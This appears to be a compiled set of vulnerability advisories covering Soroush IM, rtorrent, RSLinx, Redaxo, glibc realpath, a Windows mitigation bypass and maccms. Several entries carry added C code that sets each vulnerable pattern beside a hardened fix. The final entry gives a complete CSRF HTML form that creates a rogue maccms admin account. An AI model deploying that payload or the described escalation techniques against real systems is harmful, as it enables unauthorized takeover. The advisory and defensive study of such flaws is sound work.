Soroush IM Desktop app 0.15 – Authentication Bypass

Attackers can unlock the client app installed on Windows (other platforms untested) without the passcode and gain access to all files, chats, images, etc. The attacker can then send and receive messages of any kind on behalf of the authorized user. A PoC (.NET 4.0 Visual Basic) is provided.

rtorrent 0.9.6 – Denial of Service

The crash is caused by unchecked parsing of the bencoded handshake data map. Specifically, by advertising a massive length for a string (the key of a map entry), the attacker makes malloc fail and return NULL, which is then passed to a memcpy call that segfaults. This can be triggered actively by sending the crafted data to a seeding rtorrent client, or passively when a downloading rtorrent client connects to a malicious peer.
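The bug pattern described above, as an added example that is not rtorrent's code: a minimal bencode string parser in the vulnerable form (length trusted, malloc result unchecked) beside a hardened form that bounds the claimed length by the bytes actually received and checks the allocation. The inputs in main() are constructed for the demonstration; the vulnerable function returns NULL where the original would have dereferenced NULL, so the example runs without crashing.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not rtorrent's code). A bencode string is "<len>:<bytes>",
 * e.g. "4:spam". The length comes from the remote peer, so it is attacker
 * controlled. */

/* Parse the decimal length prefix. Returns a pointer just past ':' or NULL. */
static const char *parse_len(const char *p, const char *end, size_t *len_out)
{
    size_t len = 0;
    if (p >= end || *p < '0' || *p > '9')
        return NULL;
    while (p < end && *p >= '0' && *p <= '9') {
        if (len > (SIZE_MAX - 9) / 10)      /* would overflow size_t */
            return NULL;
        len = len * 10 + (size_t)(*p - '0');
        p++;
    }
    if (p >= end || *p != ':')
        return NULL;
    *len_out = len;
    return p + 1;
}

/* Vulnerable pattern: the advertised length is trusted and the malloc()
 * result is not checked. A huge length makes malloc() return NULL, which
 * the original code then hands to memcpy(). We return NULL at that point
 * instead of dereferencing it so this example can run. The over-read when
 * len exceeds the bytes received is left in, so only feed this function
 * well-formed input or a huge-length input. */
char *bstring_vulnerable(const char *buf, size_t n, size_t *out_len)
{
    size_t len;
    const char *p = parse_len(buf, buf + n, &len);
    if (!p)
        return NULL;
    char *s = malloc(len);              /* fails for len near SIZE_MAX */
    if (!s) {
        fprintf(stderr, "malloc(%zu) failed; the original memcpy(NULL, ...) would segfault\n", len);
        return NULL;
    }
    memcpy(s, p, len);                  /* over-reads buf if len > remaining */
    *out_len = len;
    return s;
}

/* Hardened: bound the length by the bytes actually present, then check malloc. */
char *bstring_safe(const char *buf, size_t n, size_t *out_len)
{
    size_t len;
    const char *p = parse_len(buf, buf + n, &len);
    if (!p)
        return NULL;
    if (len > (size_t)(buf + n - p))    /* claimed length exceeds input */
        return NULL;
    char *s = malloc(len + 1);          /* len + 1 cannot overflow: len <= n */
    if (!s)
        return NULL;
    memcpy(s, p, len);
    s[len] = '\0';
    *out_len = len;
    return s;
}

int main(void)
{
    /* Constructed inputs: a benign string and a map key with an absurd length. */
    const char benign[] = "4:spam";
    const char hostile[] = "18446744073709551000:x";
    size_t len = 0;

    char *s = bstring_safe(benign, sizeof benign - 1, &len);
    printf("safe(benign):        %s (%zu bytes)\n", s ? s : "(null)", len);
    free(s);
    printf("safe(hostile):       %s\n",
           bstring_safe(hostile, sizeof hostile - 1, &len) ? "accepted" : "rejected");
    printf("vulnerable(hostile): %s\n",
           bstring_vulnerable(hostile, sizeof hostile - 1, &len) ? "accepted" : "NULL (would have crashed)");
    return 0;
}
```

The hardened version makes the length check before the allocation, which also closes the over-read that the vulnerable version has even when malloc succeeds (a length larger than the received buffer but small enough to allocate).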

RSLinx Classic and FactoryTalk Linx Gateway – Privilege Escalation

The application suffers from an unquoted search path issue impacting the service 'dnwhodisp' for Windows deployed as part of RSLinx and FactoryTalk. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
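Why an unquoted service path is exploitable, as an added example that is not part of the advisory or the Rockwell product: when an ImagePath contains spaces and is not quoted, CreateProcess tries each prefix that ends before a space, with ".exe" appended, before the full path. The function below enumerates those candidates in order; the path it is fed is constructed for illustration and may not be the real install location, and the drive-root check only models the "system root path" case from the advisory rather than querying the real directory DACL.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the advisory's or the vendor's code. */

#define MAX_PATH_LEN 260

/* Fill out[] with the executables Windows would try for an unquoted
 * ImagePath, in the order it tries them. Returns the candidate count;
 * a quoted path is unambiguous and yields 0. */
int unquoted_candidates(const char *image_path, char out[][MAX_PATH_LEN], int max)
{
    int count = 0;
    size_t n = strlen(image_path);

    if (n == 0 || n + 5 > MAX_PATH_LEN || max <= 0)
        return 0;
    if (image_path[0] == '"')           /* quoted path: no ambiguity */
        return 0;

    for (size_t i = 0; i < n && count < max; i++) {
        if (image_path[i] != ' ')
            continue;
        /* prefix before this space, with ".exe" appended */
        memcpy(out[count], image_path, i);
        memcpy(out[count] + i, ".exe", 5);
        count++;
    }
    if (count < max) {
        memcpy(out[count], image_path, n + 1);  /* the intended binary, tried last */
        count++;
    }
    return count;
}

/* True when the candidate sits directly in the drive root (e.g. C:\Program.exe),
 * the location the advisory calls the system root path. A real audit would
 * check the DACL of every directory on the way instead. */
int candidate_in_drive_root(const char *candidate)
{
    const char *p = strchr(candidate, '\\');
    return p != NULL && strchr(p + 1, '\\') == NULL;   /* exactly one backslash */
}

int main(void)
{
    /* Constructed sample path; the real service path may differ. */
    const char *path = "C:\\Program Files\\Rockwell Software\\RSLinx\\dnwhodisp.exe";
    char cands[8][MAX_PATH_LEN];
    int n = unquoted_candidates(path, cands, 8);

    for (int i = 0; i < n; i++)
        printf("%d: %s%s\n", i + 1, cands[i],
               candidate_in_drive_root(cands[i]) ? "   <- in drive root" : "");
    return 0;
}
```

The fix on the service side is simply to wrap the ImagePath in quotes; the enumeration above then yields no candidates, which is the property to verify after patching.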

Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload

In REDAXO CMS below version 5.6.0 the mediapool addon is vulnerable. Users who have a user account, such as an editor, can use the mediapool to upload files. The mediapool addon below version 2.4.0 uses a blacklist for file uploads: users cannot upload files with the extensions php, php4, php5, php6 or php7. But if the file is named with an extension like php71 or php53, the blacklist function ignores it and the upload of a shell file is possible.
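The blacklist check described above beside an allowlist replacement, as an added example that is not REDAXO's code. It models the described behaviour (exact match of the extension against php, php4 to php7), shows that a php71 extension passes it, and shows an allowlist rejecting the same name. Whether a file named shell.php71 actually executes depends on the web server's handler configuration; the point is that a blacklist cannot enumerate every extension a handler might match. The allowed extensions are an assumption chosen for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not REDAXO's code. */

/* Copy the lowercase extension after the last '.' into ext, or "" if none. */
static void file_extension(const char *name, char *ext, size_t ext_size)
{
    const char *dot = strrchr(name, '.');
    size_t i = 0;
    ext[0] = '\0';
    if (!dot || dot == name)            /* no extension, or dotfile like .htaccess */
        return;
    for (dot++; *dot && i + 1 < ext_size; dot++)
        ext[i++] = (char)tolower((unsigned char)*dot);
    ext[i] = '\0';
}

/* Vulnerable: reject only the listed extensions and accept everything else.
 * Returns 1 when the upload is allowed. */
int upload_allowed_blacklist(const char *name)
{
    static const char *const blocked[] = { "php", "php4", "php5", "php6", "php7" };
    char ext[32];
    file_extension(name, ext, sizeof ext);
    for (size_t i = 0; i < sizeof blocked / sizeof blocked[0]; i++)
        if (strcmp(ext, blocked[i]) == 0)
            return 0;
    return 1;                           /* "php71", "php53" etc. are not listed */
}

/* Hardened: accept only an explicit allowlist of media extensions (assumed list). */
int upload_allowed_allowlist(const char *name)
{
    static const char *const allowed[] = { "jpg", "jpeg", "png", "gif", "pdf" };
    char ext[32];
    file_extension(name, ext, sizeof ext);
    for (size_t i = 0; i < sizeof allowed / sizeof allowed[0]; i++)
        if (strcmp(ext, allowed[i]) == 0)
            return 1;
    return 0;
}

int main(void)
{
    /* Constructed file names for the demonstration. */
    const char *names[] = { "photo.png", "shell.php", "shell.php71", "shell.php53" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-12s blacklist: %s   allowlist: %s\n", names[i],
               upload_allowed_blacklist(names[i]) ? "allowed " : "rejected",
               upload_allowed_allowlist(names[i]) ? "allowed " : "rejected");
    return 0;
}
```

An extension allowlist is the minimum; in practice the upload directory should also be served without script execution and the stored file renamed to a server-chosen name, so a bypass of the name check alone does not yield code execution.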

glibc ‘realpath()’ Privilege Escalation

This module attempts to gain root privileges on Linux systems by abusing a vulnerability in GNU C Library (glibc) version 2.26 and prior. This module uses halfdog's RationalLove exploit to exploit a buffer underflow in glibc realpath() and create a SUID root shell. The exploit has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1. The target system must have unprivileged user namespaces enabled.

Windows: Child Process Restriction Mitigation Bypass

It's possible to bypass the child process restriction mitigation policy by impersonating the anonymous token, leading to a security feature bypass. Windows 10 has a mitigation policy that restricts a process from creating new child processes. During process creation the token flag is checked in SeSubProcessToken, which creates the new primary token for the new process. It's also possible to specify a flag that overrides this behavior; the code looks something like the following:

    if (ChildProcessOptions & PROCESS_CREATION_CHILD_PROCESS_OVERRIDE) {
        PTOKEN CurrentToken = PsReferenceEffectiveToken(
            KeGetCurrentThread(), &Type, &CopyOnOpen, &ImpersonationLevel);
        if (Type == TokenImpersonation && ImpersonationLevel < SecurityImpersonation
            || (SeTokenIsNoChildProcessRestrictionEnforced(CurrentToken) != 0
                && Type != TokenPrimary)) {
            return STATUS_CHILD_PROCESS_BLOCKED;
        }
    }

When PROCESS_CREATION_CHILD_PROCESS_OVERRIDE is set, this checks that the effective token (primary or impersonation) does not carry the restrict-child-process flag. If the token does have the flag, STATUS_CHILD_PROCESS_BLOCKED is returned and process creation fails. The problem with this code is that it relies entirely on the process not being able to obtain an impersonation token without the flag.

MACCMS_V10 CSRF vulnerability add admin account

I found a CSRF vulnerability in maccms_v10; through this vulnerability, users can be added arbitrarily. The payload for the attack is as follows:

    <html>
    <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST">
      <input type="hidden" name="admin_id" value="" />
      <input type="hidden" name="admin_name" value="test2" />
      <input type="hidden" name="admin_pwd" value="test2" />
      <input type="hidden" name="admin_status" value="1" />
      <input type="hidden" name="admin_auth[0]" value="index/welcome" />
      <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>
